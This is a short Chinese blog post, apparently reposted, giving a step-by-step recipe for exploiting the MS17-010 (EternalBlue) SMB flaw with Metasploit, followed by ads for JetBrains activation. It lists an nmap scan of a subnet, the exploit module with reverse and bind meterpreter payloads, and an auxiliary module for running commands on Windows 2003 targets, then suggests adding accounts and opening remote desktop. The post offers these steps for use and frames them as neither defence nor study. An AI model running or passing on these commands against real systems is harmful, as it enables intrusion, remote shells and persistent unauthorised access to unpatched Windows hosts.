大家好,又见面了,我是你们的朋友全栈君。
MSF
在msf中常规的17-010打法如下
扫描是否存在ms17-010漏洞,扫描方式很多如namp或者fscan或msf等
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open
MSF常规漏洞利用
msf > use exploit/windows/smb/ms17_010_eternalblue
目标出网时反向打:
msf > set payload windows/x64/meterpreter/reverse_tcp
目标不出网时正向打(如添加了路由):
msf > set payload windows/x64/meterpreter/bind_tcp
目标为win2003
当目标为win2003时可能,虽然目标机器存在漏洞,但是可能会返回不了session
换一个打发,直接执行系统命令
msf5 > use auxiliary/admin/smb/ms17_010_command
msf5 > set command whoami
msf5 > set rhosts x.x.x.x
既然可以执行命令那就好办了~~可以添加账号、开启3389
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/130623.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...